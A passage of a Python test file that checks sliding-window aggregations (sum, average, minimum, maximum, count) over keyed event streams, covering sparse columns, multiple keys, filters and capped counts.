        {'col1': 5, 'number_of_stuff_sum_1h': 12, 'number_of_stuff_sum_2h': 15, 'number_of_stuff_sum_24h': 15, 'number_of_stuff_min_1h': 3,
         'number_of_stuff_min_2h': 1, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 5, 'number_of_stuff_max_2h': 5,
         'number_of_stuff_max_24h': 5, 'number_of_stuff_avg_1h': 4.0, 'number_of_stuff_avg_2h': 3.0, 'number_of_stuff_avg_24h': 2.5},
        {'col1': 6, 'number_of_stuff_sum_1h': 15, 'number_of_stuff_sum_2h': 20, 'number_of_stuff_sum_24h': 21, 'number_of_stuff_min_1h': 4,
         'number_of_stuff_min_2h': 2, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 6, 'number_of_stuff_max_2h': 6,
         'number_of_stuff_max_24h': 6, 'number_of_stuff_avg_1h': 5.0, 'number_of_stuff_avg_2h': 4.0, 'number_of_stuff_avg_24h': 3.0},
        {'col1': 7, 'number_of_stuff_sum_1h': 18, 'number_of_stuff_sum_2h': 25, 'number_of_stuff_sum_24h': 28, 'number_of_stuff_min_1h': 5,
         'number_of_stuff_min_2h': 3, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 7, 'number_of_stuff_max_2h': 7,
         'number_of_stuff_max_24h': 7, 'number_of_stuff_avg_1h': 6.0, 'number_of_stuff_avg_2h': 5.0, 'number_of_stuff_avg_24h': 3.5},
        {'col1': 8, 'number_of_stuff_sum_1h': 21, 'number_of_stuff_sum_2h': 30, 'number_of_stuff_sum_24h': 36, 'number_of_stuff_min_1h': 6,
         'number_of_stuff_min_2h': 4, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 8, 'number_of_stuff_max_2h': 8,
         'number_of_stuff_max_24h': 8, 'number_of_stuff_avg_1h': 7.0, 'number_of_stuff_avg_2h': 6.0, 'number_of_stuff_avg_24h': 4.0},
        {'col1': 9, 'number_of_stuff_sum_1h': 24, 'number_of_stuff_sum_2h': 35, 'number_of_stuff_sum_24h': 45, 'number_of_stuff_min_1h': 7,
         'number_of_stuff_min_2h': 5, 'number_of_stuff_min_24h': 0, 'number_of_stuff_max_1h': 9, 'number_of_stuff_max_2h': 9,
         'number_of_stuff_max_24h': 9, 'number_of_stuff_avg_1h': 8.0, 'number_of_stuff_avg_2h': 7.0, 'number_of_stuff_avg_24h': 4.5}
    ]

    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_sparse_data():
    """Two aggregated features ('col1' and 'col2') fed alternately: each event
    carries only one of the columns, so after a 'col1' event the stuff2
    aggregates still reflect the previous step, and vice versa. The very first
    event yields NaN for stuff2's avg/min/max (no sample yet) but 0 for its
    sums -- sum of an empty window is defined as 0 here.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey(
            [FieldAggregator("number_of_stuff1", "col1", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m')),
             FieldAggregator("number_of_stuff2", "col2", ["sum", "avg", "min", "max"], SlidingWindows(['1h', '2h', '24h'], '10m'))],
            Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    # Same timestamp for the col1/col2 pair at every step i.
    for i in range(10):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
        controller.emit({'col2': i}, 'tal', test_base_time + timedelta(minutes=25 * i))

    controller.terminate()
    actual = controller.await_termination()
    expected_results = [{'col1': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
                         'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
                         'number_of_stuff2_avg_1h': math.nan, 'number_of_stuff2_avg_24h': math.nan, 'number_of_stuff2_avg_2h': math.nan,
                         'number_of_stuff2_max_1h': math.nan, 'number_of_stuff2_max_24h': math.nan, 'number_of_stuff2_max_2h': math.nan,
                         'number_of_stuff2_min_1h': math.nan, 'number_of_stuff2_min_24h': math.nan, 'number_of_stuff2_min_2h': math.nan,
                         'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
                        {'col2': 0, 'number_of_stuff1_avg_1h': 0.0, 'number_of_stuff1_avg_24h': 0.0, 'number_of_stuff1_avg_2h': 0.0,
                         'number_of_stuff1_max_1h': 0, 'number_of_stuff1_max_24h': 0, 'number_of_stuff1_max_2h': 0,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 0, 'number_of_stuff1_sum_24h': 0, 'number_of_stuff1_sum_2h': 0,
                         'number_of_stuff2_avg_1h': 0.0, 'number_of_stuff2_avg_24h': 0.0, 'number_of_stuff2_avg_2h': 0.0,
                         'number_of_stuff2_max_1h': 0, 'number_of_stuff2_max_24h': 0, 'number_of_stuff2_max_2h': 0,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
                        {'col1': 1, 'number_of_stuff1_avg_1h': 0.5, 'number_of_stuff1_avg_24h': 0.5, 'number_of_stuff1_avg_2h': 0.5,
                         'number_of_stuff1_max_1h': 1, 'number_of_stuff1_max_24h': 1, 'number_of_stuff1_max_2h': 1,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 1, 'number_of_stuff1_sum_24h': 1, 'number_of_stuff1_sum_2h': 1,
                         'number_of_stuff2_avg_1h': 0.0, 'number_of_stuff2_avg_24h': 0.0, 'number_of_stuff2_avg_2h': 0.0,
                         'number_of_stuff2_max_1h': 0, 'number_of_stuff2_max_24h': 0, 'number_of_stuff2_max_2h': 0,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 0, 'number_of_stuff2_sum_24h': 0, 'number_of_stuff2_sum_2h': 0},
                        {'col2': 1, 'number_of_stuff1_avg_1h': 0.5, 'number_of_stuff1_avg_24h': 0.5, 'number_of_stuff1_avg_2h': 0.5,
                         'number_of_stuff1_max_1h': 1, 'number_of_stuff1_max_24h': 1, 'number_of_stuff1_max_2h': 1,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 1, 'number_of_stuff1_sum_24h': 1, 'number_of_stuff1_sum_2h': 1,
                         'number_of_stuff2_avg_1h': 0.5, 'number_of_stuff2_avg_24h': 0.5, 'number_of_stuff2_avg_2h': 0.5,
                         'number_of_stuff2_max_1h': 1, 'number_of_stuff2_max_24h': 1, 'number_of_stuff2_max_2h': 1,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 1, 'number_of_stuff2_sum_24h': 1, 'number_of_stuff2_sum_2h': 1},
                        {'col1': 2, 'number_of_stuff1_avg_1h': 1.0, 'number_of_stuff1_avg_24h': 1.0, 'number_of_stuff1_avg_2h': 1.0,
                         'number_of_stuff1_max_1h': 2, 'number_of_stuff1_max_24h': 2, 'number_of_stuff1_max_2h': 2,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 3, 'number_of_stuff1_sum_24h': 3, 'number_of_stuff1_sum_2h': 3,
                         'number_of_stuff2_avg_1h': 0.5, 'number_of_stuff2_avg_24h': 0.5, 'number_of_stuff2_avg_2h': 0.5,
                         'number_of_stuff2_max_1h': 1, 'number_of_stuff2_max_24h': 1, 'number_of_stuff2_max_2h': 1,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 1, 'number_of_stuff2_sum_24h': 1, 'number_of_stuff2_sum_2h': 1},
                        {'col2': 2, 'number_of_stuff1_avg_1h': 1.0, 'number_of_stuff1_avg_24h': 1.0, 'number_of_stuff1_avg_2h': 1.0,
                         'number_of_stuff1_max_1h': 2, 'number_of_stuff1_max_24h': 2, 'number_of_stuff1_max_2h': 2,
                         'number_of_stuff1_min_1h': 0, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 3, 'number_of_stuff1_sum_24h': 3, 'number_of_stuff1_sum_2h': 3,
                         'number_of_stuff2_avg_1h': 1.0, 'number_of_stuff2_avg_24h': 1.0, 'number_of_stuff2_avg_2h': 1.0,
                         'number_of_stuff2_max_1h': 2, 'number_of_stuff2_max_24h': 2, 'number_of_stuff2_max_2h': 2,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 3, 'number_of_stuff2_sum_24h': 3, 'number_of_stuff2_sum_2h': 3},
                        {'col1': 3, 'number_of_stuff1_avg_1h': 2.0, 'number_of_stuff1_avg_24h': 1.5, 'number_of_stuff1_avg_2h': 1.5,
                         'number_of_stuff1_max_1h': 3, 'number_of_stuff1_max_24h': 3, 'number_of_stuff1_max_2h': 3,
                         'number_of_stuff1_min_1h': 1, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 6, 'number_of_stuff1_sum_24h': 6, 'number_of_stuff1_sum_2h': 6,
                         'number_of_stuff2_avg_1h': 1.0, 'number_of_stuff2_avg_24h': 1.0, 'number_of_stuff2_avg_2h': 1.0,
                         'number_of_stuff2_max_1h': 2, 'number_of_stuff2_max_24h': 2, 'number_of_stuff2_max_2h': 2,
                         'number_of_stuff2_min_1h': 0, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 3, 'number_of_stuff2_sum_24h': 3, 'number_of_stuff2_sum_2h': 3},
                        {'col2': 3, 'number_of_stuff1_avg_1h': 2.0, 'number_of_stuff1_avg_24h': 1.5, 'number_of_stuff1_avg_2h': 1.5,
                         'number_of_stuff1_max_1h': 3, 'number_of_stuff1_max_24h': 3, 'number_of_stuff1_max_2h': 3,
                         'number_of_stuff1_min_1h': 1, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 6, 'number_of_stuff1_sum_24h': 6, 'number_of_stuff1_sum_2h': 6,
                         'number_of_stuff2_avg_1h': 2.0, 'number_of_stuff2_avg_24h': 1.5, 'number_of_stuff2_avg_2h': 1.5,
                         'number_of_stuff2_max_1h': 3, 'number_of_stuff2_max_24h': 3, 'number_of_stuff2_max_2h': 3,
                         'number_of_stuff2_min_1h': 1, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 6, 'number_of_stuff2_sum_24h': 6, 'number_of_stuff2_sum_2h': 6},
                        {'col1': 4, 'number_of_stuff1_avg_1h': 3.0, 'number_of_stuff1_avg_24h': 2.0, 'number_of_stuff1_avg_2h': 2.0,
                         'number_of_stuff1_max_1h': 4, 'number_of_stuff1_max_24h': 4, 'number_of_stuff1_max_2h': 4,
                         'number_of_stuff1_min_1h': 2, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 9, 'number_of_stuff1_sum_24h': 10, 'number_of_stuff1_sum_2h': 10,
                         'number_of_stuff2_avg_1h': 2.0, 'number_of_stuff2_avg_24h': 1.5, 'number_of_stuff2_avg_2h': 1.5,
                         'number_of_stuff2_max_1h': 3, 'number_of_stuff2_max_24h': 3, 'number_of_stuff2_max_2h': 3,
                         'number_of_stuff2_min_1h': 1, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 6, 'number_of_stuff2_sum_24h': 6, 'number_of_stuff2_sum_2h': 6},
                        {'col2': 4, 'number_of_stuff1_avg_1h': 3.0, 'number_of_stuff1_avg_24h': 2.0, 'number_of_stuff1_avg_2h': 2.0,
                         'number_of_stuff1_max_1h': 4, 'number_of_stuff1_max_24h': 4, 'number_of_stuff1_max_2h': 4,
                         'number_of_stuff1_min_1h': 2, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 0,
                         'number_of_stuff1_sum_1h': 9, 'number_of_stuff1_sum_24h': 10, 'number_of_stuff1_sum_2h': 10,
                         'number_of_stuff2_avg_1h': 3.0, 'number_of_stuff2_avg_24h': 2.0, 'number_of_stuff2_avg_2h': 2.0,
                         'number_of_stuff2_max_1h': 4, 'number_of_stuff2_max_24h': 4, 'number_of_stuff2_max_2h': 4,
                         'number_of_stuff2_min_1h': 2, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 9, 'number_of_stuff2_sum_24h': 10, 'number_of_stuff2_sum_2h': 10},
                        {'col1': 5, 'number_of_stuff1_avg_1h': 4.0, 'number_of_stuff1_avg_24h': 2.5, 'number_of_stuff1_avg_2h': 3.0,
                         'number_of_stuff1_max_1h': 5, 'number_of_stuff1_max_24h': 5, 'number_of_stuff1_max_2h': 5,
                         'number_of_stuff1_min_1h': 3, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 1,
                         'number_of_stuff1_sum_1h': 12, 'number_of_stuff1_sum_24h': 15, 'number_of_stuff1_sum_2h': 15,
                         'number_of_stuff2_avg_1h': 3.0, 'number_of_stuff2_avg_24h': 2.0, 'number_of_stuff2_avg_2h': 2.0,
                         'number_of_stuff2_max_1h': 4, 'number_of_stuff2_max_24h': 4, 'number_of_stuff2_max_2h': 4,
                         'number_of_stuff2_min_1h': 2, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 0,
                         'number_of_stuff2_sum_1h': 9, 'number_of_stuff2_sum_24h': 10, 'number_of_stuff2_sum_2h': 10},
                        {'col2': 5, 'number_of_stuff1_avg_1h': 4.0, 'number_of_stuff1_avg_24h': 2.5, 'number_of_stuff1_avg_2h': 3.0,
                         'number_of_stuff1_max_1h': 5, 'number_of_stuff1_max_24h': 5, 'number_of_stuff1_max_2h': 5,
                         'number_of_stuff1_min_1h': 3, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 1,
                         'number_of_stuff1_sum_1h': 12, 'number_of_stuff1_sum_24h': 15, 'number_of_stuff1_sum_2h': 15,
                         'number_of_stuff2_avg_1h': 4.0, 'number_of_stuff2_avg_24h': 2.5, 'number_of_stuff2_avg_2h': 3.0,
                         'number_of_stuff2_max_1h': 5, 'number_of_stuff2_max_24h': 5, 'number_of_stuff2_max_2h': 5,
                         'number_of_stuff2_min_1h': 3, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 1,
                         'number_of_stuff2_sum_1h': 12, 'number_of_stuff2_sum_24h': 15, 'number_of_stuff2_sum_2h': 15},
                        {'col1': 6, 'number_of_stuff1_avg_1h': 5.0, 'number_of_stuff1_avg_24h': 3.0, 'number_of_stuff1_avg_2h': 4.0,
                         'number_of_stuff1_max_1h': 6, 'number_of_stuff1_max_24h': 6, 'number_of_stuff1_max_2h': 6,
                         'number_of_stuff1_min_1h': 4, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 2,
                         'number_of_stuff1_sum_1h': 15, 'number_of_stuff1_sum_24h': 21, 'number_of_stuff1_sum_2h': 20,
                         'number_of_stuff2_avg_1h': 4.0, 'number_of_stuff2_avg_24h': 2.5, 'number_of_stuff2_avg_2h': 3.0,
                         'number_of_stuff2_max_1h': 5, 'number_of_stuff2_max_24h': 5, 'number_of_stuff2_max_2h': 5,
                         'number_of_stuff2_min_1h': 3, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 1,
                         'number_of_stuff2_sum_1h': 12, 'number_of_stuff2_sum_24h': 15, 'number_of_stuff2_sum_2h': 15},
                        {'col2': 6, 'number_of_stuff1_avg_1h': 5.0, 'number_of_stuff1_avg_24h': 3.0, 'number_of_stuff1_avg_2h': 4.0,
                         'number_of_stuff1_max_1h': 6, 'number_of_stuff1_max_24h': 6, 'number_of_stuff1_max_2h': 6,
                         'number_of_stuff1_min_1h': 4, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 2,
                         'number_of_stuff1_sum_1h': 15, 'number_of_stuff1_sum_24h': 21, 'number_of_stuff1_sum_2h': 20,
                         'number_of_stuff2_avg_1h': 5.0, 'number_of_stuff2_avg_24h': 3.0, 'number_of_stuff2_avg_2h': 4.0,
                         'number_of_stuff2_max_1h': 6, 'number_of_stuff2_max_24h': 6, 'number_of_stuff2_max_2h': 6,
                         'number_of_stuff2_min_1h': 4, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 2,
                         'number_of_stuff2_sum_1h': 15, 'number_of_stuff2_sum_24h': 21, 'number_of_stuff2_sum_2h': 20},
                        {'col1': 7, 'number_of_stuff1_avg_1h': 6.0, 'number_of_stuff1_avg_24h': 3.5, 'number_of_stuff1_avg_2h': 5.0,
                         'number_of_stuff1_max_1h': 7, 'number_of_stuff1_max_24h': 7, 'number_of_stuff1_max_2h': 7,
                         'number_of_stuff1_min_1h': 5, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 3,
                         'number_of_stuff1_sum_1h': 18, 'number_of_stuff1_sum_24h': 28, 'number_of_stuff1_sum_2h': 25,
                         'number_of_stuff2_avg_1h': 5.0, 'number_of_stuff2_avg_24h': 3.0, 'number_of_stuff2_avg_2h': 4.0,
                         'number_of_stuff2_max_1h': 6, 'number_of_stuff2_max_24h': 6, 'number_of_stuff2_max_2h': 6,
                         'number_of_stuff2_min_1h': 4, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 2,
                         'number_of_stuff2_sum_1h': 15, 'number_of_stuff2_sum_24h': 21, 'number_of_stuff2_sum_2h': 20},
                        {'col2': 7, 'number_of_stuff1_avg_1h': 6.0, 'number_of_stuff1_avg_24h': 3.5, 'number_of_stuff1_avg_2h': 5.0,
                         'number_of_stuff1_max_1h': 7, 'number_of_stuff1_max_24h': 7, 'number_of_stuff1_max_2h': 7,
                         'number_of_stuff1_min_1h': 5, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 3,
                         'number_of_stuff1_sum_1h': 18, 'number_of_stuff1_sum_24h': 28, 'number_of_stuff1_sum_2h': 25,
                         'number_of_stuff2_avg_1h': 6.0, 'number_of_stuff2_avg_24h': 3.5, 'number_of_stuff2_avg_2h': 5.0,
                         'number_of_stuff2_max_1h': 7, 'number_of_stuff2_max_24h': 7, 'number_of_stuff2_max_2h': 7,
                         'number_of_stuff2_min_1h': 5, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 3,
                         'number_of_stuff2_sum_1h': 18, 'number_of_stuff2_sum_24h': 28, 'number_of_stuff2_sum_2h': 25},
                        {'col1': 8, 'number_of_stuff1_avg_1h': 7.0, 'number_of_stuff1_avg_24h': 4.0, 'number_of_stuff1_avg_2h': 6.0,
                         'number_of_stuff1_max_1h': 8, 'number_of_stuff1_max_24h': 8, 'number_of_stuff1_max_2h': 8,
                         'number_of_stuff1_min_1h': 6, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 4,
                         'number_of_stuff1_sum_1h': 21, 'number_of_stuff1_sum_24h': 36, 'number_of_stuff1_sum_2h': 30,
                         'number_of_stuff2_avg_1h': 6.0, 'number_of_stuff2_avg_24h': 3.5, 'number_of_stuff2_avg_2h': 5.0,
                         'number_of_stuff2_max_1h': 7, 'number_of_stuff2_max_24h': 7, 'number_of_stuff2_max_2h': 7,
                         'number_of_stuff2_min_1h': 5, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 3,
                         'number_of_stuff2_sum_1h': 18, 'number_of_stuff2_sum_24h': 28, 'number_of_stuff2_sum_2h': 25},
                        {'col2': 8, 'number_of_stuff1_avg_1h': 7.0, 'number_of_stuff1_avg_24h': 4.0, 'number_of_stuff1_avg_2h': 6.0,
                         'number_of_stuff1_max_1h': 8, 'number_of_stuff1_max_24h': 8, 'number_of_stuff1_max_2h': 8,
                         'number_of_stuff1_min_1h': 6, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 4,
                         'number_of_stuff1_sum_1h': 21, 'number_of_stuff1_sum_24h': 36, 'number_of_stuff1_sum_2h': 30,
                         'number_of_stuff2_avg_1h': 7.0, 'number_of_stuff2_avg_24h': 4.0, 'number_of_stuff2_avg_2h': 6.0,
                         'number_of_stuff2_max_1h': 8, 'number_of_stuff2_max_24h': 8, 'number_of_stuff2_max_2h': 8,
                         'number_of_stuff2_min_1h': 6, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 4,
                         'number_of_stuff2_sum_1h': 21, 'number_of_stuff2_sum_24h': 36, 'number_of_stuff2_sum_2h': 30},
                        {'col1': 9, 'number_of_stuff1_avg_1h': 8.0, 'number_of_stuff1_avg_24h': 4.5, 'number_of_stuff1_avg_2h': 7.0,
                         'number_of_stuff1_max_1h': 9, 'number_of_stuff1_max_24h': 9, 'number_of_stuff1_max_2h': 9,
                         'number_of_stuff1_min_1h': 7, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 5,
                         'number_of_stuff1_sum_1h': 24, 'number_of_stuff1_sum_24h': 45, 'number_of_stuff1_sum_2h': 35,
                         'number_of_stuff2_avg_1h': 7.0, 'number_of_stuff2_avg_24h': 4.0, 'number_of_stuff2_avg_2h': 6.0,
                         'number_of_stuff2_max_1h': 8, 'number_of_stuff2_max_24h': 8, 'number_of_stuff2_max_2h': 8,
                         'number_of_stuff2_min_1h': 6, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 4,
                         'number_of_stuff2_sum_1h': 21, 'number_of_stuff2_sum_24h': 36, 'number_of_stuff2_sum_2h': 30},
                        {'col2': 9, 'number_of_stuff1_avg_1h': 8.0, 'number_of_stuff1_avg_24h': 4.5, 'number_of_stuff1_avg_2h': 7.0,
                         'number_of_stuff1_max_1h': 9, 'number_of_stuff1_max_24h': 9, 'number_of_stuff1_max_2h': 9,
                         'number_of_stuff1_min_1h': 7, 'number_of_stuff1_min_24h': 0, 'number_of_stuff1_min_2h': 5,
                         'number_of_stuff1_sum_1h': 24, 'number_of_stuff1_sum_24h': 45, 'number_of_stuff1_sum_2h': 35,
                         'number_of_stuff2_avg_1h': 8.0, 'number_of_stuff2_avg_24h': 4.5, 'number_of_stuff2_avg_2h': 7.0,
                         'number_of_stuff2_max_1h': 9, 'number_of_stuff2_max_24h': 9, 'number_of_stuff2_max_2h': 9,
                         'number_of_stuff2_min_1h': 7, 'number_of_stuff2_min_24h': 0, 'number_of_stuff2_min_2h': 5,
                         'number_of_stuff2_sum_1h': 24, 'number_of_stuff2_sum_24h': 45, 'number_of_stuff2_sum_2h': 35}]

    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_sparse_data_uneven_feature_occurrence():
    """A key whose two aggregated columns appear in disjoint events: col1 only
    once up front, col2 on every later event. Each aggregator must track only
    the column it saw, while the other aggregator's fields are still emitted.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey(
            [FieldAggregator("number_of_stuff1", "col1", ["sum", "avg", "min", "max"],
                             SlidingWindows(['1h', '2h', '24h'], '10m')),
             FieldAggregator("number_of_stuff2", "col2", ["sum", "avg", "min", "max"],
                             SlidingWindows(['1h', '2h', '24h'], '10m'))],
            Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    controller.emit({'col1': 0}, 'tal', test_base_time)
    for i in range(10):
        controller.emit({'col2': i}, 'tal', test_base_time + timedelta(minutes=25 * i))
    controller.terminate()
    actual = controller.await_termination()
    windows = ('1h', '2h', '24h')
    # col1 only ever carries the single value 0, so all of its aggregates stay flat.
    stuff1_fields = {}
    for w in windows:
        stuff1_fields[f'number_of_stuff1_avg_{w}'] = 0.0
        stuff1_fields[f'number_of_stuff1_max_{w}'] = 0
        stuff1_fields[f'number_of_stuff1_min_{w}'] = 0
        stuff1_fields[f'number_of_stuff1_sum_{w}'] = 0
    # Before any col2 value arrives, avg/max/min of col2 are NaN while its sums are 0.
    # NOTE(review): equality against NaN works here because both sides hold the
    # math.nan singleton, so dict comparison takes the identity fast path —
    # same reliance as the original literal expectation.
    first_record = {'col1': 0, **stuff1_fields}
    for w in windows:
        first_record[f'number_of_stuff2_avg_{w}'] = math.nan
        first_record[f'number_of_stuff2_max_{w}'] = math.nan
        first_record[f'number_of_stuff2_min_{w}'] = math.nan
        first_record[f'number_of_stuff2_sum_{w}'] = 0
    expected_results = [first_record]
    # col2 events are 25 minutes apart: a 1h window holds the last 3 of them,
    # a 2h window the last 5, and the 24h window all of them.
    events_per_window = {'1h': 3, '2h': 5, '24h': None}
    for i in range(10):
        record = {'col2': i, **stuff1_fields}
        for w in windows:
            span = events_per_window[w]
            start = 0 if span is None else max(0, i - span + 1)
            values = list(range(start, i + 1))
            record[f'number_of_stuff2_avg_{w}'] = sum(values) / len(values)
            record[f'number_of_stuff2_max_{w}'] = max(values)
            record[f'number_of_stuff2_min_{w}'] = min(values)
            record[f'number_of_stuff2_sum_{w}'] = sum(values)
        expected_results.append(record)
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_multiple_keys_aggregation_flow():
    """Events alternate between two keys; each key must accumulate its own
    independent sliding-window state.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m'))],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for event_index in range(10):
        controller.emit({'col1': event_index}, f'{event_index % 2}',
                        test_base_time + timedelta(minutes=event_index))
    controller.terminate()
    actual = controller.await_termination()
    # Events are a minute apart, so every window spans the key's whole history.
    # Key '0' sees values 0, 2, 4, ... and key '1' sees 1, 3, 5, ...
    expected_results = []
    for event_index in range(10):
        per_key_values = range(event_index % 2, event_index + 1, 2)
        total = sum(per_key_values)
        mean = total / len(per_key_values)
        expected_results.append({
            'col1': event_index,
            'number_of_stuff_sum_1h': total, 'number_of_stuff_sum_2h': total,
            'number_of_stuff_sum_24h': total,
            'number_of_stuff_avg_1h': mean, 'number_of_stuff_avg_2h': mean,
            'number_of_stuff_avg_24h': mean})
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_aggregations_with_filters_flow():
    """aggr_filter drops events whose is_valid != 0, so only even-valued col1
    events contribute to the aggregates while every event is still emitted.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m'),
                                        aggr_filter=lambda element: element['is_valid'] == 0)],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i, 'is_valid': i % 2},
                        'tal', test_base_time + timedelta(minutes=i))
    controller.terminate()
    actual = controller.await_termination()
    # The aggregates advance on even events (is_valid == 0) and stay flat on odd ones.
    expected_results = []
    for i in range(10):
        accepted = [value for value in range(i + 1) if value % 2 == 0]
        total = sum(accepted)
        mean = total / len(accepted)
        expected_results.append({
            'col1': i, 'is_valid': i % 2,
            'number_of_stuff_sum_1h': total, 'number_of_stuff_sum_2h': total,
            'number_of_stuff_sum_24h': total,
            'number_of_stuff_avg_1h': mean, 'number_of_stuff_avg_2h': mean,
            'number_of_stuff_avg_24h': mean})
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_aggregations_with_max_values_flow():
    """With max_value=1 the count aggregation is capped per 1h period, so the
    24h count effectively counts distinct hours containing events.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("num_hours_with_stuff_in_the_last_24h", "col1", ["count"],
                                        SlidingWindows(['24h'], '1h'),
                                        max_value=1)],
                       Table("test", NoopDriver())),
        Reduce([], lambda acc, x: append_return(acc, x)),
    ]).run()
    for i in range(10):
        controller.emit({'col1': i}, 'tal', test_base_time + timedelta(minutes=10 * i))
    controller.terminate()
    actual = controller.await_termination()
    # Events arrive every 10 minutes; the capped count reaches 2 once events
    # span a second hour bucket (from the seventh event, i >= 6).
    expected_results = [
        {'col1': i, 'num_hours_with_stuff_in_the_last_24h_count_24h': 1 if i < 6 else 2}
        for i in range(10)]
    assert actual == expected_results, \
        f'actual did not match expected. \n actual: {actual} \n expected: {expected_results}'
def test_sliding_window_simple_aggregation_flow_multiple_fields():
    """Three aggregators over three different columns of the same events, with
    differing windows and periods, all emitted on every record.
    """
    controller = build_flow([
        SyncEmitSource(),
        AggregateByKey([FieldAggregator("number_of_stuff", "col1", ["sum", "avg"],
                                        SlidingWindows(['1h', '2h', '24h'], '10m')),
